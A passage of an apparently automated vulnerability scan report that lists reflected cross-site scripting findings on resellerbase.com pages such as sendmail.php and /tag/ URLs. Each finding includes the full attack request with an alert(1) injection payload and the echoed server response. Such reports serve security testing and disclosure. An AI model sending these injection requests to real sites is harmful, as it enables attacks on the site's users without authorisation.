2.4153. http://www.resellerbase.com/sendmail.php [to parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the to request parameter is copied into the HTML document as plain text between tags. The payload 120bd<img%20src%3da%20onerror%3dalert(1)>508c1d5827af744e was submitted in the to parameter. This input was echoed as 120bd<img src=a onerror=alert(1)>508c1d5827af744e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=120bd<img%20src%3da%20onerror%3dalert(1)>508c1d5827af744e&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>120bd<img src=a onerror=alert(1)>508c1d5827af744e</b>
...[SNIP]...

2.4154. http://www.resellerbase.com/sendmail.php [to parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the to request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a1a"><img%20src%3da%20onerror%3dalert(1)>234190cb646557666 was submitted in the to parameter. This input was echoed as c1a1a\"><img src=a onerror=alert(1)>234190cb646557666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=c1a1a"><img%20src%3da%20onerror%3dalert(1)>234190cb646557666&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="to" value="c1a1a\"><img src=a onerror=alert(1)>234190cb646557666" />
...[SNIP]...

2.4155. http://www.resellerbase.com/sendmail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload e9b68<img%20src%3da%20onerror%3dalert(1)>c2bea504c4f was submitted in the u parameter. This input was echoed as e9b68<img src=a onerror=alert(1)>c2bea504c4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=e9b68<img%20src%3da%20onerror%3dalert(1)>c2bea504c4f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>e9b68<img src=a onerror=alert(1)>c2bea504c4f</b>
...[SNIP]...

2.4156. http://www.resellerbase.com/sendmail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload e2508<img%20src%3da%20onerror%3dalert(1)>f3e82f94621190868 was submitted in the u parameter. This input was echoed as e2508<img src=a onerror=alert(1)>f3e82f94621190868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=e2508<img%20src%3da%20onerror%3dalert(1)>f3e82f94621190868&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>e2508<img src=a onerror=alert(1)>f3e82f94621190868</b>
...[SNIP]...

2.4157. http://www.resellerbase.com/sendmail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42af8"><img%20src%3da%20onerror%3dalert(1)>e3860e22eb8a0c4ff was submitted in the u parameter. This input was echoed as 42af8\"><img src=a onerror=alert(1)>e3860e22eb8a0c4ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=42af8"><img%20src%3da%20onerror%3dalert(1)>e3860e22eb8a0c4ff&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.4158. http://www.resellerbase.com/sendmail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c391"><img%20src%3da%20onerror%3dalert(1)>6207c112f84 was submitted in the u parameter. This input was echoed as 7c391\"><img src=a onerror=alert(1)>6207c112f84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=7c391"><img%20src%3da%20onerror%3dalert(1)>6207c112f84 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="u" value="7c391\"><img src=a onerror=alert(1)>6207c112f84" />
...[SNIP]...

2.4159. http://www.resellerbase.com/sendmail.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80d82<script>alert(1)</script>0f163728eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendmail.php80d82<script>alert(1)</script>0f163728eec/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.php80d82<script>alert(1)</script>0f163728eec/ was not found on this server.</p>
...[SNIP]...

2.4160. http://www.resellerbase.com/suggest_category.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/suggest_category.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4b9ca<script>alert(1)</script>3eae090b4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suggest_category.php4b9ca<script>alert(1)</script>3eae090b4c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /suggest_category.php4b9ca<script>alert(1)</script>3eae090b4c was not found on this server.</p>
...[SNIP]...

2.4161. http://www.resellerbase.com/suggest_category.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/suggest_category.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e990<script>alert(1)</script>4dbc159498276f492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /suggest_category.php1e990<script>alert(1)</script>4dbc159498276f492?captcha_key=555-555-0199@example.com&pflag=send&parent=7&submit=Suggest+Category&cat_name=Peter+Wiener HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/suggest_category.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /suggest_category.php1e990<script>alert(1)</script>4dbc159498276f492?captcha_key=555-555-0199@example.com&pflag=send&parent=7&submit=Suggest+Category&cat_name=Peter+Wiener was not found on this server.</p>
...[SNIP]...

2.4162. http://www.resellerbase.com/tag/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d52a5<script>alert(1)</script>651ce569326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd52a5<script>alert(1)</script>651ce569326/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd52a5<script>alert(1)</script>651ce569326/ was not found on this server.</p>
...[SNIP]...

2.4163. http://www.resellerbase.com/tag/Outsource+SEO [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/Outsource+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 779cb<script>alert(1)</script>cfdffc545bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag779cb<script>alert(1)</script>cfdffc545bb/Outsource+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag779cb<script>alert(1)</script>cfdffc545bb/Outsource+SEO was not found on this server.</p>
...[SNIP]...

2.4164. http://www.resellerbase.com/tag/Reseller+SEO [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/Reseller+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12417<script>alert(1)</script>1a80fb4ffa4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag12417<script>alert(1)</script>1a80fb4ffa4/Reseller+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag12417<script>alert(1)</script>1a80fb4ffa4/Reseller+SEO was not found on this server.</p>
...[SNIP]...

2.4165. http://www.resellerbase.com/tag/Resellers+SEO [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/Resellers+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bcee<script>alert(1)</script>bae5a6581c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag1bcee<script>alert(1)</script>bae5a6581c1/Resellers+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1bcee<script>alert(1)</script>bae5a6581c1/Resellers+SEO was not found on this server.</p>
...[SNIP]...

2.4166. http://www.resellerbase.com/tag/SEO+Reseller [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+Reseller

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18462<script>alert(1)</script>767cef018f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag18462<script>alert(1)</script>767cef018f0/SEO+Reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag18462<script>alert(1)</script>767cef018f0/SEO+Reseller was not found on this server.</p>
...[SNIP]...

2.4167. http://www.resellerbase.com/tag/SEO+Resellers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+Resellers

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d71f1<script>alert(1)</script>dac84b73d28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd71f1<script>alert(1)</script>dac84b73d28/SEO+Resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd71f1<script>alert(1)</script>dac84b73d28/SEO+Resellers was not found on this server.</p>
...[SNIP]...

2.4168. http://www.resellerbase.com/tag/SEO+outsourcing [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+outsourcing

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7c58<script>alert(1)</script>472a4cd0810 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga7c58<script>alert(1)</script>472a4cd0810/SEO+outsourcing HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga7c58<script>alert(1)</script>472a4cd0810/SEO+outsourcing was not found on this server.</p>
...[SNIP]...

2.4169. http://www.resellerbase.com/tag/SEO+reseller+program [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/SEO+reseller+program

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6f368<script>alert(1)</script>ee0edd6ecf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag6f368<script>alert(1)</script>ee0edd6ecf1/SEO+reseller+program HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6f368<script>alert(1)</script>ee0edd6ecf1/SEO+reseller+program was not found on this server.</p>
...[SNIP]...

2.4170. http://www.resellerbase.com/tag/TGP [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f64f5<script>alert(1)</script>5b94b89158c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf64f5<script>alert(1)</script>5b94b89158c/TGP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf64f5<script>alert(1)</script>5b94b89158c/TGP was not found on this server.</p>
...[SNIP]...

2.4171. http://www.resellerbase.com/tag/TGP [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3e77<script>alert(1)</script>3d4c24d8d5bcf2ce0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagf3e77<script>alert(1)</script>3d4c24d8d5bcf2ce0/TGP?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

